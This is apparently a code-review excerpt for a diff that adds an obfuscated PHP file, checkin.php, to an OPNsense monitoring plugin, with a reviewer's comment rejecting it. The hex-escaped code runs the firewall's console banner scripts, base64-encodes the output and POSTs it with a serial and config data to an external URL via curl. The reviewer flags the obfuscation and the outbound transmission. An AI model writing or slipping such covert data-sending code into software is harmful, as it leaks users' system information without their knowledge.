net-mgmt/pfmonitor/src/opnsense/scripts/PFMonitor/checkin.php

```diff
@@ -0,0 +1,10 @@
A\x4cS"}["\x62\x6ej\x77c\x62\x6c\x67\x78\x6bt"]}=="\x63o\x6eso\x6ce"){$crohnqxijfx="\x73c\x72\x75p\x6c\x6fad";${"G\x4cO\x42A\x4c\x53"}["\x61\x6d\x68\x73\x62\x65\x71"]="s\x63\x72up\x6co\x61\x64";${"GL\x4f\x42\x41L\x53"}["yg\x64hk\x70jgc\x68\x6f"]="b\x61\x6e\x6ee\x72";${"\x47\x4cOB\x41L\x53"}["c\x69zd\x6cs\x6a\x62k"]="\x63onso\x6c\x65";$pzdwts="c\x6f\x6e\x73\x6fl\x65";${"\x47\x4c\x4f\x42A\x4c\x53"}["\x78\x73\x76\x71t\x79\x6b\x68"]="\x62\x61\x6e\x6e\x65\x72";${"\x47\x4c\x4f\x42\x41L\x53"}["\x6a\x6er\x78j\x6d\x65\x71\x74"]="s\x63r\x64ata";${"G\x4cO\x42\x41\x4cS"}["j\x78\x6e\x6b\x6e\x62\x78"]="\x64\x61\x74\x65con\x66i\x67";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["tu\x76u\x69q\x78\x6f\x6a\x6a"]="\x73\x63\x72u\x70\x6co\x61d";${"\x47\x4c\x4f\x42ALS"}["\x77a\x71o\x6cjq\x75"]="c\x6fn\x73\x6fl\x65";${"\x47\x4cO\x42A\x4c\x53"}["ycm\x69d\x61"]="\x73\x63\x72upl\x6fa\x64";exec("e\x63\x68o\x20-n\x20\"\x22 | /u\x73r/\x6coca\x6c/\x65t\x63/rc\x2ei\x6ei\x74\x69\x61l.\x62\x61\x6e\x6e\x65r 2>/de\x76/nu\x6c\x6c",${${"\x47L\x4f\x42\x41\x4cS"}["y\x67\x64h\x6bp\x6a\x67\x63\x68\x6f"]});exec("ech\x6f -n\x20\x22\"\x20|\x20/us\x72/local/et\x63/\x72c\x2e\x69\x6eit\x69al 2\x3e/d\x65\x76/n\x75ll",${${"\x47\x4cO\x42\x41\x4cS"}["\x63\x69z\x64\x6csj\x62\x6b"]});${"\x47LO\x42\x41LS"}["c\x63\x62x\x63\x74\x6b"]="\x73c\x72\x75\x70\x6c\x6f\x61\x64";${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x73h\x74\x68\x71\x73\x62\x6d\x74\x6f"]}=implode("\n",${${"\x47LO\x42\x41L\x53"}["\x78\x73v\x71t\x79\x6b\x68"]});${$pzdwts}=implode("\n",${${"\x47LO\x42\x41\x4cS"}["u\x66k\x6epd"]});${${"\x47LO\x42\x41\x4cS"}["\x75\x66k\x6epd"]}=${${"\x47\x4cOB\x41\x4c\x53"}["s\x68thq\x73\x62\x6d\x74o"]}.${${"\x47LO\x42\x41\x4cS"}["\x77a\x71o\x6c\x6a\x71u"]};${${"G\x4cO\x42A\x4c\x53"}["jnr\x78\x6am\x65qt"]}=base64_encode(${${"\x47\x4c\x4f\x42A\x4cS"}["u\x66kn\x70d"]});$kwfwkugw="\x73\x63r\x75p\x6co\x61\x64";${"G\x4c\x4f\x42\x41\x4cS"}["bv\x79x\x78e\x6ab"]="s\x63\x72\x64a\x74\x61";${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x79\x63\x6d\x69da"]}=curl_init(${${"\x47L\x4f\x42\x41L\x53"}["\x79\x79\x70q\x64vt\x65\x68\x6d"]});${${"\x47L\x4f\x42\x41\x4cS"}["x\x6c\x73w\x6ef\x61"]}=array("\x73\x65\x72ia\x6c"=>${${"\x47\x4c\x4fBALS"}["\x6au\x76e\x69\x6c"]},"confi\x67"=>${${"\x47\x4c\x4fBA\x4c\x53"}["\x6a\x78\x6e\x6b\x6e\x62\x78"]},"da\x74\x61"=>${${"\x47\x4cOB\x41\x4c\x53"}["b\x76yxx\x65jb"]});curl_setopt(${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x74\x75v\x75\x69\x71x\x6f\x6a\x6a"]},CURLOPT_POST,true);curl_setopt(${${"\x47L\x4fB\x41\x4cS"}["b\x79a\x63\x69\x78\x76f"]},CURLOPT_POSTFIELDS,http_build_query(${${"\x47\x4c\x4fB\x41\x4c\x53"}["xls\x77\x6e\x66\x61"]}));curl_setopt(${${"\x47L\x4fB\x41LS"}["am\x68\x73\x62\x65\x71"]},CURLOPT_RETURNTRANSFER,true);curl_setopt(${${"\x47\x4cOB\x41\x4c\x53"}["by\x61\x63\x69\x78\x76\x66"]},CURLOPT_CONNECTTIMEOUT,4);curl_setopt(${$kwfwkugw},CURLOPT_TIMEOUT,8);${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x66bz\x73\x74\x63\x63\x78"]}=curl_exec(${$crohnqxijfx});curl_close(${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x63\x63\x62xctk"]});}die();
```

Comment:
unacceptable in any way
* license probably incompatible BSD 2 CLAUSE
* obfuscated code (at least it does not look like it is malicious) but sends data to an external server